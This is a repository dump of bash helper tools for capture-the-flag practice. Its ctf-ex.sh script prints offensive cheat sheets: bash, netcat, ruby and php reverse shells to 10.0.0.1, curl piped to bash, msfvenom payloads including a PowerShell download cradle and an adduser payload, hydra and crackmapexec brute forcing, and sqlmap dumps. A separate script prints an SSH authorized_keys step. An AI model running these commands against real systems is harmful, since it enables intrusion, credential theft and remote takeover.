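├── README.md
├── make.sh
├── scripts
├── ctf-connect.sh
├── ctf-ex.sh
├── ctf-py.sh
├── ctf-ssh.sh
└── ctf-wordlist-names.sh
└── solve.py
/README.md:
--------------------------------------------------------------------------------
# CTF-bash-tools
Toolset for automating common management actions used in CTFs

## Tools
- `ctf-py` to create a solve.py script
- `ctf-connect ip port` to create a connect.sh script
- `ctf-ex cmd` to see examples of a certain command
- `ctf-ssh` to generate an rsa keypair for ssh login
- `ctf-wordlist-names names-file` to generate a wordlist from first and last names

## Installation
```bash
git clone https://github.com/PinkDraconian/CTF-bash-tools.git
cd CTF-bash-tools
./make.sh
source ~/.bashrc
```

## Credits
- Thanks to [OneMask](https://gitlab.com/onemask) for writing the ctf-wordlist-names bash code!

## Ending words
Thanks for using these tools.
Any recommendations, feature requests, and so on, are always welcome!
--------------------------------------------------------------------------------
/make.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#
# Script to add aliases for all the scripts to ~/.bash_aliases
# Firstly, it resolves the directory this script lives in (so it works from any cwd)
# Then it appends the aliases to ~/.bash_aliases unless they were added before
# Lastly it prompts the user to source ~/.bashrc or restart the terminal
#

set -eu

# Resolve the repository directory from the script's own location rather than from
# $(pwd): the old version wrote wrong alias targets when run from another directory.
repo_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
readonly repo_dir
readonly marker='# Aliases for CTF-bash-tools (https://github.com/PinkDraconian/CTF-bash-tools)'
aliases_file=~/.bash_aliases
readonly aliases_file

# Re-running make.sh used to append a second copy of every alias; skip when the
# marker comment is already present.
if [ -f "$aliases_file" ] && grep -qF -- "$marker" "$aliases_file"; then
  echo "[!] Aliases for CTF-bash-tools are already present in $aliases_file; nothing added."
  echo "    If you moved the repository, delete the old block from $aliases_file and run ./make.sh again."
  exit 0
fi

# Each path is shell-quoted with %q so a repository path containing spaces or quotes
# is written as one literal alias target instead of being re-parsed by the shell.
{
  printf '\n%s\n' "$marker"
  for tool in ctf-py ctf-connect ctf-ex ctf-ssh ctf-wordlist-names; do
    printf 'alias %s=%q\n' "$tool" "$repo_dir/scripts/$tool.sh"
  done
} >> "$aliases_file"

# ~/.bash_aliases is only read when ~/.bashrc sources it; hint if that does not seem to be the case
if ! grep -qs 'bash_aliases' ~/.bashrc; then
  echo "[!] Note: ~/.bashrc does not appear to read ~/.bash_aliases; add 'source ~/.bash_aliases' to it."
fi

# Prompt user to source ~/.bashrc or restart the terminal
cat <<'EOF'
Aliases have been added!
You can now use
'ctf-py' to create a solve.py script
'ctf-connect ip port' to create a connect.sh script
'ctf-ex cmd' to see examples of a certain command
'ctf-ssh' to generate an rsa keypair for ssh login
'ctf-wordlist-names names-file' to generate a wordlist from first and last names
In order to use these, either run 'source ~/.bashrc' or restart the terminal.
If you upgraded the script, you can delete the old entries from ~/.bash_aliases
EOF
--------------------------------------------------------------------------------
/scripts/ctf-connect.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#
# Script to create a connect.sh file that can be used to connect to a challenge
# Firstly, it checks that exactly two arguments (ip and port) were supplied, else it prints a help message
# Then it checks that the port is a number in 1-65535
# Then it checks if the connect.sh already exists
# Then it creates the actual file, with both arguments shell-quoted
# Lastly it makes it executable
#

# Help prompt: the old check (`$# -eq 0`) accepted a single argument and wrote "nc ip" with no port
if [ $# -ne 2 ]; then
  echo "Usage: ctf-connect ip port" >&2
  exit 1
fi

ip=$1
port=$2

# The port is written into a generated script, so reject anything that is not a plain number
case "$port" in
  ''|*[!0-9]*)
    echo "[!] port must be numeric, got: $port" >&2
    exit 1
    ;;
esac
if [ "$port" -lt 1 ] || [ "$port" -gt 65535 ]; then
  echo "[!] port must be between 1 and 65535, got: $port" >&2
  exit 1
fi

# Checking if connect.sh already exists
if [ -f connect.sh ]; then
  echo "[!] connect.sh already exists."
  exit 1
fi

# Creating and filling file. %q shell-quotes both values, so an argument containing
# spaces, quotes or metacharacters becomes a literal nc argument instead of being
# interpreted as shell syntax when connect.sh runs.
printf '#!/bin/bash\n\nnc %q %q\n' "$ip" "$port" > connect.sh

# Making file executable
chmod +x connect.sh
--------------------------------------------------------------------------------
/scripts/ctf-ex.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#TODO: volatility/tcpdump/tshark/ssh/netcat/linux/recon-ng/links
#
# Displays usage examples for a given command; `ctf-ex -h` lists the commands implemented.
# Every example block is printed through a quoted here-document (<<'EOF'), so nothing
# inside it is touched by the shell: the old echo "..." strings expanded $0, $TERM,
# $ip, $sock, $esp and $eip and executed `tty` at print time, which corrupted the examples.
# NOTE(review): angle-bracket placeholders (e.g. after --url, --pid, -r) look like they were
# lost when this listing was extracted; the blanks after those flags are where they stood.
# Usage: ctf-ex <command>
#

option=$(tr '[:upper:]' '[:lower:]' <<< "$1") # Convert command choice to lowercase

if [[ $option == "-h" || $# != 1 ]]; then
  cat <<'EOF'
Usage: ctf-ex
Commands implemented
- pwn
- gdb
- linux
- msfvenom
- wfuzz
- reverse-shell
- nmap
- hydra
- curl
- gobuster
- crackmapexec
- tty
- john
- ping
- find
- pwntools
- sqlmap
- smbclient.py
- mount
EOF

elif [[ $option == "linux" ]]; then
  # `echo $0` below is meant literally; the quoted here-doc keeps it from expanding to this script's name
  cat <<'EOF'
Enable logging record the interactive session
script
close script session
ctrl + D
check current shell
echo $0
all details about system
uname -a
view all process
ps auxfww
check open ports and services listening
netstat -anp
check defined hosts
cat /etc/hosts
check filesystem
df -h
check crontab
crontab -l
check initab
cat /etc/inittab
check shared memory
ipcs -mp
check the login activity
last
monitor network trafic
sudo iftop
investigate sockets
ss -nlpt

EOF

elif [[ $option == "crackmapexec" \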
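]]; then
  cat <<'EOF'
Bruteforce smb
crackmapexec smb 10.10.10.192 -u users -p pass
Bruteforce winrm
crackmapexec winrm 10.10.10.192 -u users -p pass
EOF

elif [[ $option == "gobuster" ]]; then
  cat <<'EOF'
Enumerate directories on HTTP:
gobuster dir --wordlist /usr/share/wordlists/dirb/big.txt --url [-x ] [-o ]
Enumerate directories on HTTPS:
gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url [-x ] [-o ]
Enumerate vhosts:
gobuster vhost --wordlist /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt --url 
EOF

elif [[ $option == "tty" ]]; then
  # `$TERM` and the backticked `tty` are part of the example text; the old echo "..." form
  # expanded the variable and ran tty(1) while printing
  cat <<'EOF'
Fully upgrading to TTY shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl+z
echo $TERM && tput lines && tput cols
stty raw -echo
fg
export SHELL=bash
export TERM=xterm-256color
stty rows 24 columns 121
Listner: socat file:`tty`,raw,echo=0 tcp-listen:4444
Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
EOF

elif [[ $option == "john" ]]; then
  cat <<'EOF'
Cracking hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash_file
john the ripper, show the cracked passwords
john ~/hash.txt --show
john the ripper, continue session
john --restore=session_name
john the ripper over GPU, OpenCL formats, start session
john --session=session_name --format=opencl ~/hash.txt

EOF

elif [[ $option == "mount" ]]; then
  cat <<'EOF'
Mount a shared folder
mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share
EOF

elif [[ $option == "ping" ]]; then
  cat <<'EOF'
Setting up listener for pings
tcpdump -i tun0 icmp and icmp[icmptype]=icmp-echo
EOF

elif [[ $option == "find" ]]; then
  cat <<'EOF'
Finding a file and dismissing permission denied messages
find / -type f -name "keyword" 2>&1 | grep -v "Permission denied"
Finding all SUID and SGID files in the file system
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
Finding all readable by user files
find / -type f -readable
Finding all writable by user files
find / -type d -writable
Find all files with the word password in them
find / -name '*{password}*' -print

EOF

elif [[ $option == "pwntools" ]]; then
  cat <<'EOF'
Making a remote connection
io = remote('ip', port)
Setting debug mode
context.log_level = 'DEBUG'
Pattern generation
cyclic(x)
Pattern Finding
cyclic_find(0xadress)
URL encoding
urlencode("string")
packing to big-endian
pack(1, endian='big')
loading ELF files
e = ELF('/path/to/file')
more details
https://github.com/Gallopsled/pwntools-tutorial

EOF

elif [[ $option == "smbclient.py" ]]; then
  cat <<'EOF'
Login
smbclient.py DOMAIN/USERNAME:PASS@IP
EOF

elif [[ $option == "sqlmap" ]]; then
  # Fixed in the text: "sqlmp" -> "sqlmap", the en dash in "–dump" -> "--dump", and the
  # "¶m_n" entity mangling -> "&param_n"; all three broke copy-paste of the examples
  cat <<'EOF'
SQLi testing from saved request from burp
sqlmap --level 5 --risk 3 --batch -r
SQLi from GET request
sqlmap --level 5 --risk 3 --batch -u
SQLI for specefic parameters
sqlmap --level 5 --risk 3 --batch -u --method "POST" --data="parm_1=value&param_n=value"
GET SQL Shell
sqlmap --dbms=mysql -u "" --sql-shell
LIST all databases
sqlmap -u "" --dbs
LIST all tables in a database
sqlmap -u "" -D site_db --tables
Dump the contents of a DB table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users --dump
List all columns in a table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns
Test on page that require login
sqlmap --cookie="value=X" -u "http://testsite.com/sell.php
Add headers to the query
sqlmap --headers="header:value;header:value" -u "http://testsite.com/sell.php

EOF
elif [[ $option == "curl" ]]; then
  cat <<'EOF'
POST parameters
curl --data "email=test@test.com&password=test"
Specify user agent
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
OUTPUT response header to stdout
curl -i http://10.10.10.10/profile.php
Follow redirect 302
curl -L http://10.10.10.10/profile.php
Pipe a remote script directly to bash
curl -sSk "http://10.10.10.10/linpeas.sh" | bash
Adding additonal headrs
curl -H "X-Header: value"

EOF

elif [[ $option == "hydra" ]]; then
  # `$ip` is a placeholder in the example text; the old echo "..." form expanded it to an empty string
  cat <<'EOF'
Brute windows RDP
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Brute SMB users with rockyou
hydra -L usernames.txt -P passwords.txt $ip smb -V -f
Brute LDAP users with rockyou.txt
hydra -L users.txt -P passwords.txt $ip ldap2 -V -f
Brute HTTP GET login
hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
Bute ssh on port 22
hydra $ip -s 22 ssh -l -P big_wordlist.txt
Brute ssh using list of users and passwords
hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
Check more here:
https://redteamtutorials.com/2018/10/25/hydra-brute-force-techniques/

EOF
elif [[ $option == "nmap" ]]; then
  # Fixed in the text: the en dash in "–top-ports" -> "--top-ports"
  cat <<'EOF'
Scan from predifined list
nmap -iL list.txt
scan top X ports
nmap --top-ports X 192.168.1.1
scan all 65535 ports
nmap -p- 192.168.1.1
scan a subnet
nmap 192.168.1.0/24
scan selected ports and ignore discorvery
nmap -Pn -F 192.168.1.1
scan using tcp connect
nmap -sT 192.168.1.1
aggressive service detection
nmap -sV --version-intensity 5 192.168.1.1
ligher banner grabbing detection
nmap -sV --version-intensity 0 192.168.1.1
Scan with a set of scripts
nmap -sV --script=smb* 192.168.1.1
use diminutive fragmented IP packets
nmap -f 192.168.1.1
Specify the size (need to be multiple of 16)
nmap --mtu 16 192.168.1.1
use firewall bypass script
nmap -sS -T5 192.168.1.1 --script firewall-bypass
list nmap scripts
ls -la /usr/share/nmap/scripts/

EOF
elif [[ $option == "reverse-shell" ]]; then
  # `$sock` in the php line is part of the example; the old echo "..." form expanded it to nothing
  cat <<'EOF'
bash reverse-shell
bash -i >& /dev/tcp// 0>&1
netcat
nc -e /bin/sh 10.0.0.1 1234
ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
weevely web shell
weevely generate
weevely password

EOF

elif [[ $option == "wfuzz" ]]; then
  cat <<'EOF'
URL brute forcing
wfuzz -c -z /path/to/wordlist.txt --hc 404 http:///FUZZ
GET params brute forcing
wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 http:///index.php?user=FUZZ&pass=FUZ2Z
POST params brute forcing
wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php
Encoding payloads
wfuzz -z list,1-2-3,md5-sha1-none http://webscantest.com/FUZZ
Fuzz custom headers
wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "myheader2: headervalue2"

EOF

elif [[ $option == "msfvenom" ]]; then
  cat <<'EOF'
List payloads
msfvenom -l payloads
List encoders
msfvenom -l encoders
windows meterpreter reverse-shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
windows create user
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
Execute commands
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell "IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')"" -f python
Encoding a reverse-shell with shikata_ga_nai
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
embedded reverse-shell inside exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
PHP reverse-shell
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > phpreverseshell.php
Python shell
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw > shell.py
Linux meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf

EOF

elif [[ $option == "gdb" ]]; then
  # `$esp`, `$eip` and the bare `$` are gdb register syntax; the old echo "..." form expanded them to nothing
  cat <<'EOF'
load the binary with args arguments
gdb --args binary arguments
Launch gdb with a process
gdb --pid
set arguments
set args
Launch the binary with stdin data
r < <(perl -e 'print "A"x5')
load a plugin inside gdb
source
Show values as hex
p/x 10+12
show shared libraries
info sharedlibrary
Check the registers
info registers
check value of a specified register
$
show memory at given adress in hex
x/x $esp
show the instruction on eip
x/i $eip
check the break points
info break
set a break point in an Address
break *Address
delete all breakpoints
clear
remove a breakpoint
delete
disable a breakpoint
disable
Force the current function to return im-mediately, passing the given value
return
turn asm syntax to intel
set disassembly-flavor intel
step one machine code instruction
stepi
continue until current function return
finish
show the stack frame info
info frame
attach network process
set follow-fork-mode child

EOF

elif [[ $option == "pwn" ]]; then
  cat <<'EOF'
Check property of a binary_file
checksec binary
Check file type
file binary_file
Disassemble with intel syntax
objdump -M intel -d program_name
Output kernel message
dmesg
Display headers of an elf file
readelf -l binary_file
Display program sections size
size binary_file
Output dynamic realocation
objdump -r binary_file
Disbale ASLR
echo 0 > /proc/sys/kernel/randomize_va_space

EOF

else
  # The old chain printed nothing and exited 0 for a command it did not know
  echo "[!] Unknown command: $option (run 'ctf-ex -h' for the list)" >&2
  exit 1
fi
--------------------------------------------------------------------------------
/scripts/ctf-py.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#
# Creates a solve.py file initialized with a
# - Shebang
# - Main function
# - Calling the main function if __name__ == __main__
# It first will check if the file doesn't already exists to make sure we're not overriding anything.
# Then it will create the file
# Lastly, it will make the file executable
#

# Check if solve.py doesn't already exist
if [ -f solve.py ]; then
  echo "[!] solve.py already exists."
  exit 1
fi

# Making the file. The quoted here-doc writes the template verbatim, including the
# four-space indentation Python requires under def/if.
cat > solve.py <<'EOF'
#!/usr/bin/env python3

def main():
    pass


if __name__ == '__main__':
    main()
EOF

# Making the file executable
chmod +x solve.py
--------------------------------------------------------------------------------
/scripts/ctf-ssh.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#
# Script to create new ssh keypair (with empty password), set the correct permissions and tell the user where to upload them
# The key is written to ./id_rsa and ./id_rsa.pub in the current directory, never into ~/.ssh.
#

# Checking if id_rsa already exists
if [ -f id_rsa ] || [ -f id_rsa.pub ]; then
  echo "[!] id_rsa or id_rsa.pub files already exist."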
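exit 1
fi

# Creating keypair. An empty passphrase is the documented intent of this tool; abort if
# generation fails so the chmod and cat below do not run against a missing file.
ssh-keygen -t rsa -f id_rsa -P "" || exit 1

# Setting correct permissions
chmod 600 id_rsa

# Message for user. $(cat id_rsa.pub) is expanded here on purpose: the printed command
# embeds the freshly generated public key so it can be pasted on the target.
echo "
Put the public key in ~/.ssh/authorized_keys
echo \"$(cat id_rsa.pub)\" >> ~/.ssh/authorized_keys

Log in using
ssh -i id_rsa user@ip"
--------------------------------------------------------------------------------
/scripts/ctf-wordlist-names.sh:
--------------------------------------------------------------------------------
#!/bin/bash

#
# Gets a list with `firstname lastname` and formats them into the following:
# NameSurname, Name.Surname, NamSur (3letters of each), Nam.Sur, NSurname, N.Surname, SurnameName, Surname.Name, SurnameN, Surname.N,
# plus the '-' separated variants of the same pairs; everything is lowercased.
# Output is written to formatted_name_wordlist.txt in the current directory.
#

# The old test read `$ == "-h"`, which compares a literal "$" and so never matched
if [[ $1 == "-h" ]]; then
  echo "Usage: ctf-wordlist-names names-file"
  exit 0
fi
if [[ $# != 1 ]]; then
  echo "Usage: ctf-wordlist-names names-file" >&2
  exit 1
fi
if [[ ! -r $1 ]]; then
  echo "[!] cannot read names file: $1" >&2
  exit 1
fi

if [ -f formatted_name_wordlist.txt ]; then
  echo "[!] formatted_name_wordlist.txt file already exist."
  exit 1
fi

# Read the file directly instead of `cat $1 |`: no unquoted filename, no pipeline subshell,
# and -r keeps backslashes in names intact. The `|| [[ -n $line ]]` clause still handles a
# last line that lacks a trailing newline.
while IFS= read -r line || [[ -n $line ]]; do
  # Lowercase the whole line once, then split on whitespace; any extra columns are ignored.
  line=$(tr '[:upper:]' '[:lower:]' <<< "$line")
  read -r firstname lastname _ <<< "$line"
  # A blank or single-word line would only produce junk entries such as "." and "-"
  [[ -n $firstname && -n $lastname ]] || continue
  f1=${firstname:0:1}
  f3=${firstname:0:3}
  l3=${lastname:0:3}
  # Same 14 variants, in the same order, as the original echo block
  printf '%s\n' \
    "$firstname.$lastname" \
    "$f1.$lastname" \
    "$f1-$lastname" \
    "$firstname$lastname" \
    "$firstname-$lastname" \
    "$f3$l3" \
    "$f3.$l3" \
    "$f1$lastname" \
    "$lastname$firstname" \
    "$lastname-$firstname" \
    "$lastname.$firstname" \
    "$lastname$f1" \
    "$lastname-$f1" \
    "$lastname.$f1"
done < "$1" >> formatted_name_wordlist.txt
--------------------------------------------------------------------------------
/solve.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

def main():
    pass


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------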